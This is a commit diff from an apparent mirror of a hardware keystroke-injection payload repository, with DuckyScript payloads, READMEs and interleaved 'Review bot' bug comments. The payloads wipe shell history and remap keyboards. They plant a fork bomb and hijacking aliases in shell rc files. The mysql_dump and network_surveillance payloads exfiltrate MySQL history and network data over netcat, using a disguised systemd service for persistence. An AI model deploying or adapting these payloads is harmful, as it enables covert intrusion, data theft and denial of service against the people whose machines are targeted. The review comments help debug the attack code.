mirror of https://github.com/hak5/omg-payloads.git
commit
b6916df78e
|
@ -0,0 +1,19 @@
|
||||||
|
## About
|
||||||
|
# Title: capslock_disable
|
||||||
|
# Description: capslock_disable disables capslock on target's system.
|
||||||
|
# AUTHOR: drapl0n
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Execution
|
||||||
|
# Target: GNU/Linux.
|
||||||
|
# Attackmodes: HID.
|
||||||
|
|
||||||
|
## capslock_disable: capslock_disable disables capslock on target's system. Can be used as module to craft payloads which requires long time to execute.
|
||||||
|
|
||||||
|
### Workflow:
|
||||||
|
1. Executing Terminal Emulator.
|
||||||
|
2. Prevent storing history.
|
||||||
|
3. Executing command which disables capslock.
|
||||||
|
4. Terminating terminal instance.
|
||||||
|
|
||||||
|
#### Support me if you like my work:
|
||||||
|
* https://twitter.com/drapl0n
|
|
@ -0,0 +1,16 @@
|
||||||
|
REM Title: capslock_disable
|
||||||
|
REM Description: Disables capslock on target's system. Can be used as module to craft payloads which requires long time to execute.
|
||||||
|
REM AUTHOR: drapl0n
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Execution
|
||||||
|
REM Target: GNU/Linux.
|
||||||
|
REM Attackmodes: HID.
|
||||||
|
|
||||||
|
DELAY 1000
|
||||||
|
CTRL ALT t
|
||||||
|
DELAY 500
|
||||||
|
STRING unset HISTFILE
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING setxkbmap -option ctrl:nocaps && exit
|
||||||
|
ENTER
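Review bot: The REM Description on the second line says the payload "disables capslock", but the command typed on the last STRING line, `setxkbmap -option ctrl:nocaps`, remaps Caps Lock to an additional Control key and only changes the keymap of the current X session — it is not persistent across logins and, being an X11 tool, is not expected to apply under Wayland sessions. The README for this payload makes the same claim. Suggested header so it matches the command: `REM Description: Remaps Caps Lock to Ctrl (setxkbmap ctrl:nocaps) for the current X session on target's system.`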
|
|
@ -0,0 +1,24 @@
|
||||||
|
## About:
|
||||||
|
# Title: browser_execOMG
|
||||||
|
# Description: browser_execOMG finds browser installed in target's system and searche URL in it.
|
||||||
|
# AUTHOR: drapl0n
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Execution.
|
||||||
|
# Target: Unix-like operating systems.
|
||||||
|
# Attackmodes: HID
|
||||||
|
|
||||||
|
## browser_execOMG: A payload which finds installed browser in target's system and searches URL in it. This payload can be used as a module to craft a new payload which requires browser execution in it.
|
||||||
|
|
||||||
|
### Workflow:
|
||||||
|
1. Executing Terminal Emulator.
|
||||||
|
2. Prevent storing history.
|
||||||
|
3. Storing script in target's system.
|
||||||
|
4. Granting execution privilege.
|
||||||
|
5. Executing script in background.
|
||||||
|
|
||||||
|
### Usage:
|
||||||
|
|
||||||
|
* Replace URL at line `15` in `payload.txt` with URL you want to search for.
|
||||||
|
|
||||||
|
#### Support me if you like my work:
|
||||||
|
* https://twitter.com/drapl0n
|
|
@ -0,0 +1,22 @@
|
||||||
|
REM Title: browser_execOMG
|
||||||
|
REM Description: browser_execOMG finds browser installed in target's system and searche URL in it.
|
||||||
|
REM AUTHOR: drapl0n
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Execution.
|
||||||
|
REM Target: Unix-like operating systems.
|
||||||
|
REM Attackmodes: HID
|
||||||
|
|
||||||
|
DELAY 1000
|
||||||
|
CTRL ALT t
|
||||||
|
DELAY 500
|
||||||
|
STRING unset HISTFILE
|
||||||
|
ENTER
|
||||||
|
DELAY 100
|
||||||
|
STRING echo -e "url=hak5.org \n#\!/bin/bash\nfunction browser(){\n\tbrowser=\$(ls /bin/ | grep -Ew 'firefox|chromium|brave'| head -1)\n\tif [ \"\$browser\" = firefox ]; then\n\t\texecBrowser=\$(echo \$browser --private-window)\n\t\texport execBrowser\n\telif [ \"\$browser\" = chromium ]; then\n\t\texecBrowser=\$(echo \$browser --incognito)\n\t\texport execBrowser\n\telif [ \"\$browser\" = brave ]; then\n\t\texecBrowser=\$(echo \$browser --incognito)\n\t\texport execBrowser\n\telse\n\t\techo \"Browser not found.\"\n\tfi\n}\nbrowser\n\$execBrowser \$url " > /tmp/sys
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING chmod +x /tmp/sys
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING /tmp/./sys & disown && exit
|
||||||
|
ENTER
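Review bot: The script written by the `echo -e` STRING on line 15 begins with `url=hak5.org ` and only then `#\!/bin/bash`, so the interpreter line ends up on line 2 where it is just a comment; in addition, if the typing shell has history expansion enabled (interactive bash does by default), `\!` inside double quotes keeps its backslash and the file receives `#\!/bin/bash`, which is not a valid shebang either, so `/tmp/./sys` only runs because bash falls back to interpreting the file itself when the kernel returns ENOEXEC. Put the interpreter line first and keep `url=` after it; the sibling payloads share the `#\!/bin/bash` spelling, so this note covers them too. Separately, the `else` branch prints `Browser not found.` and then falls through to the final `\$execBrowser \$url` line with `execBrowser` empty, which tries to execute `hak5.org` as a command; add `exit 1` after that echo so the script stops cleanly.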
|
|
@ -0,0 +1,27 @@
|
||||||
|
## About:
|
||||||
|
* Title: keyboard_hangover
|
||||||
|
* Description: keyboard_hangover is a powerful oneliner payload which randomly remaps target's keyboard.
|
||||||
|
* AUTHOR: drapl0n
|
||||||
|
* Version: 1.0
|
||||||
|
* Category: Execution.
|
||||||
|
* Target: Unix-like operating systems.
|
||||||
|
* Attackmodes: HID.
|
||||||
|
|
||||||
|
## keyboard_hangover: keyboard_hangover is a powerful oneliner payload which randomly remaps target's keyboard and and auto-triggers it.
|
||||||
|
|
||||||
|
### Features:
|
||||||
|
1. Randomly remaps keyboard.
|
||||||
|
2. Auto-Triggers on shell execution.
|
||||||
|
3. Persistent payload.
|
||||||
|
4. Fast execution.
|
||||||
|
5. Oneliner.
|
||||||
|
|
||||||
|
### Workflow:
|
||||||
|
1. Prevent storing history.
|
||||||
|
2. Creating random string generation mechanism.
|
||||||
|
3. Creating loop to find files.
|
||||||
|
4. Granting executing privileges.
|
||||||
|
5. Executing Payload Script.
|
||||||
|
|
||||||
|
#### Support me if you like my work:
|
||||||
|
* https://twitter.com/drapl0n
|
|
@ -0,0 +1,22 @@
|
||||||
|
REM Title: keyboard_hangover
|
||||||
|
REM Description: keyboard_hangover is a powerful payload which randomly remaps target's keyboard..
|
||||||
|
REM AUTHOR: drapl0n
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Execution.
|
||||||
|
REM Target: Unix-like operating systems.
|
||||||
|
REM Attackmodes: HID
|
||||||
|
|
||||||
|
DELAY 1000
|
||||||
|
CTRL ALT t
|
||||||
|
DELAY 500
|
||||||
|
STRING unset HISTFILE
|
||||||
|
ENTER
|
||||||
|
DELAY 100
|
||||||
|
STRING echo -e "#\!/bin/bash\n\nmapping_file=\"/var/tmp/system\"\n\nkeycodes=(\$(seq 8 255))\ncharacters=(\$(cat /dev/urandom | tr -dc 'a-zA-Z' | fold -w 1 | head -n \${#keycodes[@]}))\n\nmapping_content=""\nfor((i=0; i<\${#keycodes[@]}; i++)); do\n\tkeycode=\${keycodes[i]}\n\tchar=\${characters[i]}\n\tmapping_content+=\"keycode \$keycode = \$char\\\n\"\ndone\n\necho -e \$mapping_content > \$mapping_file\n\nls -a ~/ | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"xmodmap /var/tmp/system\" >> ~/.zshrc\nfi\nls -a ~/ | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"xmodmap /var/tmp/system\" >> ~/.bashrc\nfi" > /tmp/sys
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING chmod +x /tmp/sys
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING /tmp/./sys && rm /tmp/sys && exit
|
||||||
|
ENTER
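Review bot: The generated script tests for rc files with `ls -a ~/ | grep 'zshrc' &> /dev/null` followed by `if [ \$? = 0 ]; then`, which parses `ls` output, matches any name that merely contains the substring (`.zshrc.bak`, `zshrc.old`), and inspects the pipeline status one statement later. The direct test is `if [ -f ~/.zshrc ]; then` (and `if [ -f ~/.bashrc ]; then` for the second block). The same construct appears in the shell_trigger, swap_jack, mysql_dump, network_surveillance and OMGNet payload files; this note covers all of them.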
|
|
@ -0,0 +1,24 @@
|
||||||
|
## About:
|
||||||
|
* Title: rename_entropy
|
||||||
|
* Description: rename_entropy is a powerful payload which renames target files along with extensions in home directory.
|
||||||
|
* AUTHOR: drapl0n
|
||||||
|
* Version: 1.0
|
||||||
|
* Category: Execution.
|
||||||
|
* Target: Unix-like operating systems.
|
||||||
|
* Attackmodes: HID.
|
||||||
|
|
||||||
|
## rename_entropy: rename_entropy is a powerful payload which renames target files along with extensions in home directory.
|
||||||
|
|
||||||
|
### Features:
|
||||||
|
1. Renames files and directories.
|
||||||
|
2. Fast paylaod execution.
|
||||||
|
3. Oneliner Payload.
|
||||||
|
|
||||||
|
### Workflow:
|
||||||
|
1. Prevent storing history.
|
||||||
|
2. Creating random string generation mechanism.
|
||||||
|
3. Granting executing privileges.
|
||||||
|
4. Executing Payload Script.
|
||||||
|
|
||||||
|
#### Support me if you like my work:
|
||||||
|
* https://twitter.com/drapl0n
|
|
@ -0,0 +1,22 @@
|
||||||
|
REM Title: rename_entropy
|
||||||
|
REM Description: rename_entropy, rename_entropy is a powerful payload which renames target files with extensions.
|
||||||
|
REM AUTHOR: drapl0n
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Execution.
|
||||||
|
REM Target: GNU/Linux.
|
||||||
|
REM Attackmodes: HID.
|
||||||
|
|
||||||
|
DELAY 1000
|
||||||
|
CTRL ALT t
|
||||||
|
DELAY 500
|
||||||
|
STRING unset HISTFILE
|
||||||
|
ENTER
|
||||||
|
DELAY 100
|
||||||
|
STRING echo -e "#\!/bin/bash\ndir=\"/home/\$(whoami)/testdir/\"\ncd \"\$dir\" || exit\nfor file in *; do\n\trand_str=\$(cat /dev/urandom | tr -dc 'a-zA-Z' | fold -w 10 | head -n 1)\n\trand_ext=\$(cat /dev/urandom | tr -dc 'a-zA-Z' | fold -w 3 | head -n 1)\n\tmv \"\$file\" \"\${rand_str}.\${rand_ext}\"\ndone" > /tmp/sys
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING chmod +x /tmp/sys
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING /tmp/./sys && rm /tmp/sys && exit
|
||||||
|
ENTER
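Review bot: The REM Description (and the README) say the payload renames files "in home directory", but the script written on line 15 sets `dir=\"/home/\$(whoami)/testdir/\"` and does `cd \"\$dir\" || exit`, so it only ever touches `~/testdir/` and silently exits when that directory does not exist. The header should describe the real scope rather than the code being widened: `REM Description: rename_entropy renames every entry in ~/testdir/ to a random 10-letter name with a random 3-letter extension.` The README's "home directory" wording needs the same correction.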
|
|
@ -0,0 +1,23 @@
|
||||||
|
## About:
|
||||||
|
# Title: SHELL_TRIGGER
|
||||||
|
# Description: SHELL_TRIGGER is an payload which triggers commands/scripts on shell execution on target's system OR triggers commands/scripts when target executes terminal emulator.
|
||||||
|
# AUTHOR: drapl0n
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Execution.
|
||||||
|
# Target: Unix-like operating systems.
|
||||||
|
# Attackmodes: HID
|
||||||
|
|
||||||
|
## SHELL_TRIGGER: SHELL_TRIGGER is payload which triggers commands/scripts on shell execution on target's system OR triggers commands/scripts when target executes terminal emulator.
|
||||||
|
|
||||||
|
### Workflow:
|
||||||
|
1. Executing Terminal Emulator.
|
||||||
|
2. Prevent storing history.
|
||||||
|
3. Storing script in target's system.
|
||||||
|
4. Granting execution privilege.
|
||||||
|
5. Executing script in background.
|
||||||
|
|
||||||
|
### Changes to be made:
|
||||||
|
* Replace command on line `15` in `payload.txt` with command/script you want your target to execute on shell execution.
|
||||||
|
|
||||||
|
#### Support me if you like my work:
|
||||||
|
* https://twitter.com/drapl0n
|
|
@ -0,0 +1,25 @@
|
||||||
|
REM Title: shell_trigger
|
||||||
|
REM Description: shell_trigger is an payload which triggers commands/scripts on shell execution on target's system OR triggers commands/scripts when target executes terminal emulator.
|
||||||
|
REM AUTHOR: drapl0n
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Execution.
|
||||||
|
REM Target: Unix-like operating systems.
|
||||||
|
REM Attackmodes: HID
|
||||||
|
|
||||||
|
DELAY 1000
|
||||||
|
CTRL ALT t
|
||||||
|
DELAY 500
|
||||||
|
STRING unset HISTFILE
|
||||||
|
ENTER
|
||||||
|
DELAY 100
|
||||||
|
STRING cmd="echo hello world"
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING echo -e "ls -a ~/ | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"$cmd\" >> ~/.zshrc\nfi\n\nls -a ~/ | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"$cmd\" >> ~/.bashrc\nfi" >> /tmp/sys
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING chmod +x /tmp/sys
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING /tmp/./sys && rm /tmp/sys && exit
|
||||||
|
ENTER
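Review bot: The STRING line that writes the trigger script redirects with `>> /tmp/sys` (append) while every sibling payload creates its script with `>`, so anything already present at `/tmp/sys` from an earlier payload run is kept and executed together with the new content by `/tmp/./sys`. Use `> /tmp/sys` here as well. The written script also has no interpreter line, unlike the other payloads, so it depends entirely on the invoking shell's fallback to run it.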
|
|
@ -0,0 +1,25 @@
|
||||||
|
## About:
|
||||||
|
* Title: swap_jack
|
||||||
|
* Description: swap_jack, simple yet powerful payload which can be used to replace one command with another on target's system.
|
||||||
|
* AUTHOR: drapl0n
|
||||||
|
* Version: 1.0
|
||||||
|
* Category: Execution.
|
||||||
|
* Target: Unix-like operating systems.
|
||||||
|
* Attackmodes: HID, Storage.
|
||||||
|
|
||||||
|
## swap_jack: Simple yet Powerful payload which can be used to replace one command with another on target's system. swap_jack gives your target capability to trigger backdoors for you.
|
||||||
|
|
||||||
|
### Features:
|
||||||
|
1. Swap commands/Execute scripts covertly.
|
||||||
|
2. Persistent.
|
||||||
|
3. Can swap multiple commands.
|
||||||
|
4. Makes your target run commands/script for you.
|
||||||
|
|
||||||
|
### Usage:
|
||||||
|
* To swap custom commands make following changes at line `18` in `payload.sh`:
|
||||||
|
* Default swaped commands: `swap_array='alias ls=\"du\" \\n alias cd=\"dh\" \\n alias cat=\"lsblk\"'`.
|
||||||
|
* Example: Swapping `pwd` command with `find`:
|
||||||
|
* Add entry seperated by `\\n` to the line `18`: `swap_array='alias ls=\"du\" \\n alias cd=\"dh\" \\n alias cat=\"lsblk\"' \\n alias pwd=\"find\"`
|
||||||
|
|
||||||
|
#### Support me if you like my work:
|
||||||
|
* https://twitter.com/drapl0n
|
|
@ -0,0 +1,28 @@
|
||||||
|
REM Title: swap_jack
|
||||||
|
REM Description: swap_jack, simple yet powerful payload which can be used to replace one command with another on target’s system.
|
||||||
|
REM AUTHOR: drapl0n
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Execution.
|
||||||
|
REM Target: GNU/Linux.
|
||||||
|
REM Attackmodes: HID.
|
||||||
|
|
||||||
|
DELAY 2000
|
||||||
|
CTRL ALT t
|
||||||
|
DELAY 1900
|
||||||
|
STRING unset HISTFILE
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING echo -e "#\!/bin/bash\n" > /tmp/sys
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING echo -e "swap_array='alias ls=\"du\" \\nalias cd=\"df\" \\nalias cat=\"lsblk\"'" >> /tmp/sys
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING echo -e "\n\n\ls -a ~/ | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"\$swap_array\" >> ~/.zshrc\nfi\n\nls -a ~/ | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"\$swap_array\" >> ~/.bashrc\nfi" >> /tmp/sys
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING chmod +x /tmp/sys
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING /tmp/./sys && rm /tmp/sys && exit
|
||||||
|
ENTER
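Review bot: The default alias list written on line 18 contains `alias cd=\"df\"`, but the README documents `alias cd=\"dh\"` as the default and tells the user to edit that line, so one of the two needs correcting; the README's example also places the added `\\n alias pwd=\"find\"` after the closing `'` of `swap_array`, which would break the quoting. In the following STRING line the text starts with `\n\n\ls -a ~/`: `\l` is not an `echo -e` escape, so a literal `\ls` lands in the script — harmless, since it only bypasses aliases, but the stray backslash should be dropped so the line matches the other payloads.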
|
|
@ -0,0 +1,43 @@
|
||||||
|
REM Title: termBomb
|
||||||
|
REM Description: termBomb prompts message "!!!!!!YOU HAVE BEEN HACKED!!!!!!" and executes fork bomb on launching shell/terminal.
|
||||||
|
REM Author: drapl0n
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Execution
|
||||||
|
REM Target: Unix-like operating systems.
|
||||||
|
REM Attackmode: HID
|
||||||
|
|
||||||
|
DELAY 400
|
||||||
|
CTRL-ALT t
|
||||||
|
DELAY 400
|
||||||
|
STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
|
||||||
|
ENTER
|
||||||
|
STRING cat <<EOF > /tmp/tmppp
|
||||||
|
ENTER
|
||||||
|
STRING ls -a | grep 'zshrc' &> /dev/null
|
||||||
|
ENTER
|
||||||
|
STRING if [ 0 = 0 ]; then
|
||||||
|
ENTER
|
||||||
|
STRING echo -e "echo -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"" >> ~/.zshrc
|
||||||
|
ENTER
|
||||||
|
STRING echo ":(){ :|:& };:" >> ~/.zshrc
|
||||||
|
ENTER
|
||||||
|
STRING fi
|
||||||
|
ENTER
|
||||||
|
ENTER
|
||||||
|
STRING ls -a | grep 'bashrc' &> /dev/null
|
||||||
|
ENTER
|
||||||
|
STRING if [ 0 = 0 ]; then
|
||||||
|
ENTER
|
||||||
|
STRING echo -e "echo -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"" >> ~/.bashrc
|
||||||
|
ENTER
|
||||||
|
STRING echo ":(){ :|:& };:" >> ~/.bashrc
|
||||||
|
ENTER
|
||||||
|
STRING fi
|
||||||
|
ENTER
|
||||||
|
STRING EOF
|
||||||
|
ENTER
|
||||||
|
DELAY 300
|
||||||
|
STRING chmod +x /tmp/tmppp && /tmp/./tmppp && rm /tmp/tmppp
|
||||||
|
ENTER
|
||||||
|
STRING exit
|
||||||
|
ENTER
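Review bot: Both `if [ 0 = 0 ]; then` lines inside the here-document are tautologies, so the two `ls -a | grep '...' &> /dev/null` lines that precede them are dead code whose result is never consulted. Either drop the dead lines or make the test real, `if [ -f ~/.zshrc ]; then` and `if [ -f ~/.bashrc ]; then`, which is the structure the sibling payloads intend.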
|
|
@ -0,0 +1,33 @@
|
||||||
|
## About:
|
||||||
|
* Title: mysql_dump
|
||||||
|
* Description: mysql_dump, a oneliner payload used to exfiltrate mysql history. Looting mysql history can be useful understanding targets database schema.
|
||||||
|
* AUTHOR: drapl0n
|
||||||
|
* Version: 1.0
|
||||||
|
* Category: Exfiltaration
|
||||||
|
* Target: Unix-like operating systems with systemd.
|
||||||
|
* Attackmodes: HID.
|
||||||
|
|
||||||
|
## mysql_dump: mysql_dump payload exfiltrates MySQL history, which can be used to understand targets database schema.
|
||||||
|
|
||||||
|
### Features:
|
||||||
|
* Exfiltrates mysql_history.
|
||||||
|
* Fully Persistent.
|
||||||
|
* Waits for target to get online.
|
||||||
|
* Transfers loot once target is online.
|
||||||
|
* Oneliner payload.
|
||||||
|
|
||||||
|
### Workflow:
|
||||||
|
1. Search if mysql_history file is present.
|
||||||
|
2. Creating Loot transfer mechanism in targets system.
|
||||||
|
3. Creating local systemd service for persistence.
|
||||||
|
4. Executing Autotart mechanism.
|
||||||
|
|
||||||
|
### Usage:
|
||||||
|
1. Run netcat listner on attacking machine: `nc -lvp <port number> > <output_filename>`
|
||||||
|
2. Example: `nc -lvp 4444 > mysql_history.txt
|
||||||
|
|
||||||
|
### Changes to be made:
|
||||||
|
* Replace IP address(twice) `0.0.0.0` and Port Number `4444` on line `15`.
|
||||||
|
|
||||||
|
#### Support me if you like my work:
|
||||||
|
* https://twitter.com/drapl0n
|
|
@ -0,0 +1,22 @@
|
||||||
|
REM Title: mysql_dump
|
||||||
|
REM Description: mysql_dump, is a oneliner payload used to exfiltrate mysql history. Looting mysql history can be useful understanding targets database schema.
|
||||||
|
REM AUTHOR: drapl0n
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Exfiltaration.
|
||||||
|
REM Target: GNU/Linux.
|
||||||
|
REM Attackmodes: HID.
|
||||||
|
|
||||||
|
DELAY 2000
|
||||||
|
CTRL ALT t
|
||||||
|
DELAY 2000
|
||||||
|
STRING unset HISTFILE
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING echo -e "#\!/bin/bash\nls -a ~/ | grep -w '.mysql_history' &> /dev/null\nif [ \$? = 0 ]; then\n\tmkdir -p ~/.config/systemd/user\n\tmkdir -p /var/tmp/.system\n\tcp ~/.mysql_history /tmp/exfil\n\techo -e \"while :\\\ndo\\\n\\\tping -c 5 8.8.8.8\\\n\\\tif [ \\\$? -eq 0 ]; then\\\n\\\t\\\tnc -c 127.0.0.1 4444 < /tmp/exfil\\\n\\\tfi\\\ndone\" > /var/tmp/.system/systemBus\n\tchmod +x /var/tmp/.system/systemBus\n\techo -e \"[Unit]\\\nDescription= System BUS handler\\\n\\\n[Service]\\\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\\\nRestart=on-failure\\\nSuccessExitStatus=3 4\\\nRestartForceExitStatus=3 4\\\n\\\n[Install]\\\nWantedBy=default.target\" > ~/.config/systemd/user/systemBUS.service\n\tsystemctl --user enable --now systemBUS.service\n\tsystemctl --user start --now systemBUS.service\n\techo -e \"ls -a ~/ | grep 'zshrc' &> /dev/null\\\nif [ \\\$? = 0 ]; then\\\n\\\techo \"systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\\\nfi\\\nls -a ~/ | grep 'bashrc' &> /dev/null\\\nif [ \\\$? = 0 ]; then\\\n\\\techo \"systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\\\nfi\" > /tmp/tmmmp\n\tchmod +x /tmp/tmmmp && /tmp/./tmmmp && rm /tmp/tmmmp \nfi" > /tmp/system
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING chmod +x /tmp/system
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING /tmp/./system && rm /tmp/system && exit
|
||||||
|
ENTER
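Review bot: The README's "Changes to be made" says to replace the IP address `0.0.0.0` (twice) and port `4444` on line `15`, but the script on line 15 of this file contains `ping -c 5 8.8.8.8` and `nc -c 127.0.0.1 4444` and no `0.0.0.0` at all, so a user following the README (or an OMGNetManager-style `sed s/0.0.0.0/.../`) would change nothing. Update the README and the REM header to name the literal values that are actually on the line. The network_surveillance payload has the same mismatch (`ping -c 5 127.0.0.1` and `nc -c 127.0.0.1 4444` against a README that says `0.0.0.0` twice); this note covers it too.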
|
|
@ -0,0 +1,33 @@
|
||||||
|
## About:
|
||||||
|
* Title: network_surveillance
|
||||||
|
* Description: network_surveillance payload exfiltrates network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.
|
||||||
|
* AUTHOR: drapl0n
|
||||||
|
* Version: 1.0
|
||||||
|
* Category: Exfiltaration
|
||||||
|
* Target: Unix-like operating systems with systemd.
|
||||||
|
* Attackmodes: HID.
|
||||||
|
|
||||||
|
## network_surveillance: network_surveillance payload exfiltrates network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.
|
||||||
|
|
||||||
|
### Features:
|
||||||
|
* Exfiltrates network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.
|
||||||
|
* Fully Persistent.
|
||||||
|
* Waits for target to get online.
|
||||||
|
* Transfers loot once target is online.
|
||||||
|
* Oneliner payload.
|
||||||
|
|
||||||
|
### Workflow:
|
||||||
|
1. Extracts network information.
|
||||||
|
2. Creating Loot transfer mechanism in targets system.
|
||||||
|
3. Creating local systemd service for persistence.
|
||||||
|
4. Executing Autotart mechanism.
|
||||||
|
|
||||||
|
### Usage:
|
||||||
|
1. Run netcat listner on attacking machine: `nc -lvp <port number> > <output_filename>`
|
||||||
|
2. Example: `nc -lvp 4444 > network_surveillance.txt
|
||||||
|
|
||||||
|
### Changes to be made:
|
||||||
|
* Replace IP address(twice) `0.0.0.0` and Port Number `4444` on line `15`.
|
||||||
|
|
||||||
|
#### Support me if you like my work:
|
||||||
|
* https://twitter.com/drapl0n
|
|
@ -0,0 +1,22 @@
|
||||||
|
REM Title: network_surveillance
|
||||||
|
REM Description: network_surveillance payload exfiltrates network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.
|
||||||
|
REM AUTHOR: drapl0n
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Exfiltration.
|
||||||
|
REM Target: GNU/Linux.
|
||||||
|
REM Attackmodes: HID.
|
||||||
|
|
||||||
|
DELAY 2000
|
||||||
|
CTRL ALT t
|
||||||
|
DELAY 1000
|
||||||
|
STRING unset HISTFILE
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING echo -e "#\!/bin/bash\nmkdir -p ~/.config/systemd/user\nmkdir -p /var/tmp/.system\nnetstat -antup >> /tmp/exfil\nnetstat -nlp >> /tmp/exfil\necho -e \"while :\\\ndo\\\n\\\tping -c 5 127.0.0.1\\\n\\\tif [ \\\$? -eq 0 ]; then\\\n\\\t\\\tnc -c 127.0.0.1 4444 < /tmp/exfil\\\n\\\tfi\\\ndone\" > /var/tmp/.system/systemBus\nchmod +x /var/tmp/.system/systemBus\necho -e \"[Unit]\\\nDescription= System BUS handler\\\n\\\n[Service]\\\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\\\nRestart=on-failure\\\nSuccessExitStatus=3 4\\\nRestartForceExitStatus=3 4\\\n\\\n[Install]\\\nWantedBy=default.target\" > ~/.config/systemd/user/systemBUS.service\nsystemctl --user enable --now systemBUS.service\nsystemctl --user start --now systemBUS.service\necho -e \"ls -a ~/ | grep 'zshrc' &> /dev/null\\\nif [ \\\$? = 0 ]; then\\\n\\\techo \"systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\\\nfi\\\nls -a ~/ | grep 'bashrc' &> /dev/null\\\nif [ \\\$? = 0 ]; then\\\n\\\techo \"systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\\\nfi\" > /tmp/tmmmp\nchmod +x /tmp/tmmmp && /tmp/./tmmmp && rm /tmp/tmmmp" > /tmp/system
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING chmod +x /tmp/system
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING /tmp/./system && rm /tmp/system && exit
|
||||||
|
ENTER
|
|
@ -0,0 +1,135 @@
|
||||||
|
#!/bin/bash
|
||||||
|
allowAbort=true;
|
||||||
|
myInterruptHandler()
|
||||||
|
{
|
||||||
|
if $allowAbort; then
|
||||||
|
echo
|
||||||
|
echo -e "\n\033[1mYou terminated OMGNetManager...\033[0m" && exit 1;
|
||||||
|
fi;
|
||||||
|
}
|
||||||
|
trap myInterruptHandler SIGINT;
|
||||||
|
echo -e "\033[4m\033[1mWelcome to OMGNet Manager!!!\033[0m"
|
||||||
|
echo
|
||||||
|
echo -e "1] Connect with target.\n2] Create new target.\n3] List available target.\n4] Remove target.\n5] Update target."
|
||||||
|
echo
|
||||||
|
read -p "Enter your choice: " ch
|
||||||
|
create () {
|
||||||
|
read -p "Enter Target's name(without whitespaces): " name
|
||||||
|
if [[ $(grep -oh "\w*$name\w*" ~/.config/OMGNet/OMGNet.db) == $name ]]; then
|
||||||
|
echo -e "\033[0;31m\e[1mOMGNetManager:Error:\e[0mName \"$name\" already exists."
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
read -p "Enter Servers IP: " ip
|
||||||
|
read -p "Enter Unique Port Number(1500-65535): " port
|
||||||
|
if [[ $(grep -oh "\w*$ip\w*" ~/.config/OMGNet/OMGNet.db) == $ip ]] && [[ $(grep -oh "\w*$port\w*" ~/.config/OMGNet/OMGNet.db) == $port ]]; then
|
||||||
|
